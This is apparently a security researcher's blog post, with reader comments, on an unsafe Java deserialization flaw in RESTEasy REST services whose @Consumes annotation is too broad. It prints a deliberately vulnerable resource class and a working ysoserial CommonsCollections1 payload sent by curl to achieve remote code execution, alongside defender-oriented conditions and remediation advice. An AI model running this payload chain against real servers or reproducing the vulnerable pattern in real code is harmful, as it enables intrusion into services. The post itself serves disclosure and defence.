RESTEasy is a Red Hat project for building REST services in Java. You can deploy and run RESTEasy services on various servlet containers, such as Apache Tomcat, Jetty and Undertow. RESTEasy is also included as a module in the WildFly and JBoss J2EE application servers.
In this post, I want to describe a server-side bug which I found while assessing the security of a project written in Java. That project exposed a REST API built with RESTEasy.
I've written a simple PoC application to demonstrate what can go wrong with RESTEasy services.
Consider the following JAX-RS resource class, named PoC_resource.
```java
package unsafe.jaxrs;

import java.util.*;
import javax.ws.rs.*;
import javax.ws.rs.core.*;

@Path("/")
public class PoC_resource {

    @POST
    @Path("/concat")
    @Produces(MediaType.APPLICATION_JSON)
    @Consumes({"*/*"})
    public Map<String, String> doConcat(Pair pair) {
        HashMap<String, String> result = new HashMap<String, String>();
        result.put("Result", pair.getP1() + pair.getP2());
        return result;
    }
}
```
This class contains a JAX-RS method named doConcat that is available via the /concat path. It accepts a "pair" parameter of class Pair.
I've added the Jackson2 dependency to pom.xml. To invoke the doConcat method, issue a POST request to the path /concat and pass JSON representing an object of class Pair in the request body. You should also send application/json in the Content-Type HTTP header.
Here is the command line to invoke the doConcat method of the JAX-RS resource PoC_resource.
```shell
curl -i -s -k -X 'POST' \
    -H 'Content-Type: application/json' \
    --data-binary $'{\"p1\":\"a\",\"p2\":\"b\"}' \
    'http://127.0.0.1:8080/unsafe-jaxrs/concat'
```
You should get a similar answer.

My demo RESTEasy application has two properties that make it vulnerable:
- The Pair class implements java.io.Serializable.
- The JAX-RS method doConcat has the @Consumes({"*/*"}) annotation.
RESTEasy uses so-called "providers" to marshal the request body into the parameter of a JAX-RS method. In my application, the Jackson2 provider marshals JSON into the "pair" parameter.
As you might guess, RESTEasy picks a suitable provider for marshalling based on the Class of the parameter and the value of the Content-Type HTTP header.
There are non-standard providers, like Jackson2 or JAXB, that you must add explicitly in pom.xml. However, there are also standard providers, located in the org.jboss.resteasy.plugins.providers package of the resteasy-jaxrs JAR (the core RESTEasy library). The most interesting standard provider is, of course, org.jboss.resteasy.plugins.providers.SerializableProvider.
When RESTEasy handles a request, it determines which content types are allowed for the JAX-RS method (the content types specified in the @Consumes annotation on the JAX-RS resource and on the resource method). RESTEasy then composes a short list of providers suitable for marshalling, based on the content types allowed for the method and the value of the Content-Type HTTP header in the request. Next it iterates over this list and invokes the isReadable() method of each provider. If isReadable() of some provider returns true, RESTEasy chooses that provider for marshalling. If none of the isReadable() methods returns true, the client gets an HTTP response with code 415.
Here you can see the listing of isReadable() method for SerializableProvider.
```java
public boolean isReadable(Class<?> type, Type genericType,
                          Annotation[] annotations, MediaType mediaType) {
    return (Serializable.class.isAssignableFrom(type))
        && (APPLICATION_SERIALIZABLE_TYPE.getType().equals(mediaType.getType()))
        && (APPLICATION_SERIALIZABLE_TYPE.getSubtype().equals(mediaType.getSubtype()));
}
```
As you can observe in the listing, SerializableProvider is used for marshalling when the parameter's class is assignable to java.io.Serializable (that is, it implements Serializable) and the Content-Type is equal to application/x-java-serialized-object.
To construct the object from the request body, the readFrom() method of SerializableProvider is invoked, which performs deserialization by calling readObject(). And we might have RCE if there are "interesting" Java classes in the CLASSPATH.
```java
public Serializable readFrom(Class<Serializable> type, Type genericType,
                             Annotation[] annotations, MediaType mediaType,
                             MultivaluedMap<String, String> httpHeaders,
                             InputStream entityStream)
        throws IOException, WebApplicationException {
    BufferedInputStream bis = new BufferedInputStream(entityStream);
    // The untrusted request body is handed directly to ObjectInputStream.readObject()
    ObjectInputStream ois = new ObjectInputStream(bis);
    try {
        return (Serializable) Serializable.class.cast(ois.readObject());
    } catch (ClassNotFoundException e) {
        throw new WebApplicationException(e);
    }
}
```
For demonstration, I've added the Apache Commons Collections 3.2.1 dependency to pom.xml.
First, I generate a payload using the ysoserial tool. Then I invoke the doConcat method with curl, using the Content-Type application/x-java-serialized-object.
```shell
java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections1 "curl 127.0.0.1:8888" > /tmp/payload

curl -i -s -k -X 'POST' \
    -H 'Content-Type: application/x-java-serialized-object' \
    -H 'Expect:' \
    --data-binary "@/tmp/payload" \
    'http://127.0.0.1:8080/unsafe-jaxrs/concat'
```

I have remote code execution.

Let’s summarize
For Pentesters. JAX-RS methods are vulnerable to the "deserialization of untrusted data" bug when the following conditions are met:
- The content type is not specified explicitly for the JAX-RS method via the @Consumes annotation, or it is specified but too broad (e.g. */*, application/*).
- The JAX-RS method has a parameter whose class is serializable.
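To make the provider-selection rule described above and the two summary conditions concrete, here is an added Python model of how RESTEasy chooses a reader (illustration written for this page, not RESTEasy's own code and not from the post); the reduced provider list, the media-type matching helper and the `deserialization_reachable` check are assumptions for illustration.

```python
"""Model of the RESTEasy reader selection described in the post (constructed
illustration, not RESTEasy's own code). Providers are reduced to the two the
post discusses: the Jackson2 JSON provider and SerializableProvider."""
from dataclasses import dataclass
from typing import Callable, List, Optional

SERIALIZED_OBJECT = "application/x-java-serialized-object"


@dataclass(frozen=True)
class Provider:
    name: str
    media_type: str  # media type the provider is registered to consume
    is_readable: Callable[[bool, str], bool]  # isReadable(param_is_serializable, content_type)


def media_type_matches(pattern: str, media_type: str) -> bool:
    """JAX-RS media-type matching with '*' wildcards in type or subtype."""
    ptype, psub = pattern.split("/", 1)
    mtype, msub = media_type.split("/", 1)
    return (ptype == "*" or ptype == mtype) and (psub == "*" or psub == msub)


PROVIDERS: List[Provider] = [
    Provider("Jackson2JsonProvider", "application/json",
             lambda serializable, ct: ct == "application/json"),
    # Mirrors SerializableProvider.isReadable(): Serializable class AND exact media type.
    Provider("SerializableProvider", SERIALIZED_OBJECT,
             lambda serializable, ct: serializable and ct == SERIALIZED_OBJECT),
]


def select_reader(consumes: List[str], content_type: str,
                  param_is_serializable: bool) -> Optional[str]:
    """Return the provider RESTEasy would pick, or None where it answers 415.
    An unspecified @Consumes is treated as */* (no restriction)."""
    allowed = consumes or ["*/*"]
    if not any(media_type_matches(c, content_type) for c in allowed):
        return None  # Content-Type not allowed by @Consumes: 415 before any isReadable()
    candidates = [p for p in PROVIDERS
                  if any(media_type_matches(c, p.media_type) for c in allowed)]
    for p in candidates:
        if p.is_readable(param_is_serializable, content_type):
            return p.name
    return None  # no provider accepted the body: 415


def deserialization_reachable(consumes: List[str], param_is_serializable: bool) -> bool:
    """Defender's check for the two summary conditions: can a client route a
    Java-serialized body to SerializableProvider for this method?"""
    return select_reader(consumes, SERIALIZED_OBJECT, param_is_serializable) == "SerializableProvider"
```

Narrowing @Consumes to application/json makes the serialized-object Content-Type fail the first check, so SerializableProvider is never consulted for that method.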
Very interesting.
I just added this to my todo: https://github.com/find-sec-bugs/find-sec-bugs/issues/198
Quick note: Jersey (which uses JAX-RS annotations) does not seem to support this by default. It does not stop people from being "creative". http://stackoverflow.com/questions/15074431/how-do-i-make-jersey-use-java-serialization
Hi Philippe!
It will be great if you add checks in Find Security Bugs.
You are right about Jersey, it does not contain built-in providers that deserialize user input as RESTEasy does. However, it has a kryo provider - https://jersey.java.net/project-info/2.23.1/jersey/project/jersey-media-kryo/dependencies.html.
If kryo provider is in the CLASSPATH, REST services that use Jersey might be vulnerable. Here is the nice post about kryo deserialization - https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-1-kryo.
Come on, it's not a bug, it's a feature.
The bug/vulnerability is in the library you use - Apache Commons collections (CVE-2015-6420). So it's unrelated to the REST implementation.
Nevertheless, I fully agree with you - The developers should always use the principle of least privilege and only allow input types they expect.